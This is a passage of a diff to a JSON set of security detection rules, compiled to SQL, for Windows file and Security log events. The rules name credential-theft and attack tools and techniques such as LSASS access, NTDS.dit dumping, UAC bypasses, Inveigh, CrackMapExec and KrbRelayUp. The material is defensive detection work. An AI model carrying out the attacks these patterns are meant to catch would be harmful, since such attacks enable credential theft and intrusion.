ESCAPE '\\'))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "status": "experimental", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.credential_access" ], "falsepositives": [ @@ -39375,1280 +39406,1325 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "New Outlook Macro Created", - "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "@ScoubiMtl", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "User genuinely creates a VB Macro for their email" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_macro_creation.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "VsCode Powershell Profile Modification", - "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "status": "experimental", - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD User Enumeration", + "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "status": "test", + "description": "Detects access to a domain user from a non-machine account", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitimate use of the profile by developers or administrators" + "Administrators configuring new users." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml" + "filename": "win_security_ad_user_enumeration.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "title": "Tap Driver Installation - Security", + "id": "9c8afa4d-0022-48f0-9456-3712466f9701", "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ "attack.exfiltration", - "attack.t1567.002" + "attack.t1048" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_tap_driver_installation.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "title": "Azure AD Health Monitoring Agent Registry Keys Access", + "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" }, { - "title": "Dynamic CSharp Compile Artefact", - "id": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", - "status": "test", - "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", - "author": "frack113", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%.cmdline' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_csharp_compile_artefact.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "OneNote Attachment File Dropped In Suspicious Location", - "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", - "status": "experimental", - "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Service Activity via SVCCTL Named Pipe", + "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "status": "test", + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate usage of \".one\" or \".onepkg\" files from those locations" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" + "filename": "win_security_svcctl_remote_service.yml" }, { - "title": "Suspicious LNK Double Extension Files", - "id": "3215aa19-f060-4332-86d5-5602511f3ca8", - "status": "experimental", - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "test", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Users creating a shortcut on e.g. desktop" + "Administrator activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_lnk_double_extension.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "status": "test", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.001" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" - ], - "filename": "file_event_win_crackmapexec_patterns.yml" - }, - { - "title": "Suspicious Files in Default GPO Folder", - "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "status": "experimental", - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", - "author": "elhoim", - "tags": [ - "attack.t1036.005", - "attack.defense_evasion" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "Created Files by Microsoft Sync Center", - "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", - "status": "experimental", - "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", - "author": "elhoim", + "title": "Processes Accessing the Microphone and Webcam", + "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "status": "test", + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.collection", + "attack.t1123" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_creation_by_mobsync.yml" + "filename": "win_security_camera_microphone_access.yml" }, { - "title": "Writing Local Admin Share", - "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "status": "experimental", - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "author": "frack113", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "status": "test", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ + "attack.persistence", "attack.lateral_movement", - "attack.t1546.002" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_writing_local_admin_share.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Suspicious Unattend.xml File Access", - "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "title": "WMI Persistence - Security", + "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "status": "test", - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "author": "frack113", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_unattend_xml.yml" + "filename": "win_security_wmi_persistence.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "title": "Addition of Domain Trusts", + "id": "0255a820-e564-4e40-af2b-6ac61160335c", + "status": "stable", + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "author": "Thomas Patzke", "tags": [ "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate extension of domain structure" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_susp_add_domain_trust.yml" }, { - "title": "EVTX Created In Uncommon Location", - "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "status": "experimental", - "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", - "author": "D3F7A5105", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Backup activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_create_evtx_non_common_locations.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.command_and_control", - "attack.t1219" + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": 